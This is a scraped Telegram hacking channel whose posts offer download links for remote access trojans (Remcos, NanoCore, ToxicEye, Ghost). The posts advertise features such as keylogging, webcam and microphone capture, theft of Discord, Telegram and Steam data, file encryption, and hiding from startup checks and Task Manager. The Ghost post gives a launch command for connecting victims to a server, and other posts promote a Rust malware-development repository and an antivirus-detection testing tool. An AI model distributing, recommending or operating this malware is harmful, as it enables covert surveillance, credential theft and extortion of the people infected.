BugCod3
6.19K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: t.iss.one/BugCod3GP
📂 Topic: t.iss.one/BugCod3Topic

🤖 Contact: t.iss.one/BugCod3BOT
📧 Email: [email protected]
Download Telegram
🌟 REMCOS RAT🌟

⬇️ Download

#rat #windows #malware

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🐭 NanoCore 🐭

⚠️ Use it on virtual machine ⚠️

📝
is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework

⬇️ Download

#Rat #Malware #Tools

👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2
👁 ToxicEye 👁
RAT + STEALER + CLIPPER

🖱 Program for remote control of windows computers via telegram bot. Written in C#

💎 Functions:
🔵 ComputerInfo
🔵 BatteryInfo
🔵 Location
🔵 Whois
🔵 ActiveWindow
🔵 Webcam
🔵 Microphone
🔵 Desktop
🔵 Keylogger
🔵 ClipboardSet
🔵 ClipboardGet
🔵 GetDiscord
🔵 GetTelegram
🔵 GetSteam
🔵 DownloadFile
🔵 UploadFile
🔵 RunFile
🔵 RunFileAdmin
🔵 Shell
🔵 EncryptFileSystem
🔵 DecryptFileSystemForkBomb
🔵 And ...

⬇️ Download
😸 Github

🔒
BugCod3


#Rat #Malware

👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
31
👻 Ghost 👻

👻 RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware

💬
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.

👁‍🗨
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:
zombie.exe 127.0.0.1 27015



📊 Features:
⚪️ Remote command execution
⚪️ Silent background process
⚪️ Download and run file (Hidden)
⚪️ Safe Mode startup
⚪️ Will automatically connect to the server
⚪️ Data sent and received is encrypted (substitution cipher)
⚪️ Files are hidden
⚪️ Installed Antivirus shown to server
⚪️ Easily spread malware through download feature
⚪️ Startup info doesn't show in msconfig or other startup checking programs like CCleaner
⚪️ Disable Task Manager

😸 Github

⬇️ Download
🔒 BugCod3

#Rat #Malware #Remote #Access

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3311
Rust for Malware Development

💬
Hello Nerds, This Repo is about using Rust for malware development and for low level stuffs.

👁‍🗨 Basics:
To Learn Rust -> Rust Book

Windows API [old]-(winapi)-> WinAPI

Windows API (by Official Microsoft) -> WinAPI

ntapi Crate -> NtAPI

Windows Internels -> Link

RedTeam Notes -> Link

WinAPI Imports to Test and Execute these Codes..
[dependencies]
winapi = { version = "0.3", features = ["winuser", "debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }
ntapi = "0.4.1"
user32-sys = "0.2.0"

Tips for Rust Beginner: save this dependencies in Cargo.toml File.

😸 Github

⬇️ Download
🔒 BugCod3

#Rust #Malware #Dev

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥21
🔍 MultCheck 🔍

💬
MultCheck is a malware-analysis tool that can be used to test the detection of a file by multiple AV engines.
It is designed to be easy to use, and to be able to test multiple AV engines. It is also designed to be easy to extend, and to be able to add custom AV engines.

🔼 Installation:
Run go build under the root directory of the project.
OR
cd src
# Build for Windows
## 64-bit
GOOS=windows GOARCH=amd64 go build -o ../bin/multcheck_x64.exe main.go

## 32-bit
GOOS=windows GOARCH=386 go build -o ../bin/multcheck_x32.exe main.go


💻 Usage:

MultCheck accepts a target file as an argument: ./multcheck <target_file>

Different built-in scanners can be used by specifying the -scanner flag: ./multcheck -scanner <scanner_name> <target_file>

Custom scanners can be added by creating a configuration file and providing the path to the file through the -scanner flag: ./multcheck -scanner <path_to_config_file> <target_file>

👤 Supported Scanners:
💻 Windows Defender (winDef)

😸 Github

⬇️ Download
🔒 BugCod3

#GO #Malware #Analysis #Tools

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
32🔥2
Experts warn of a new ATM malware family that is advertised in the cybercrime underground, it was developed to target Europe.

🌎 Blog

#ATM #Malware #News

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥21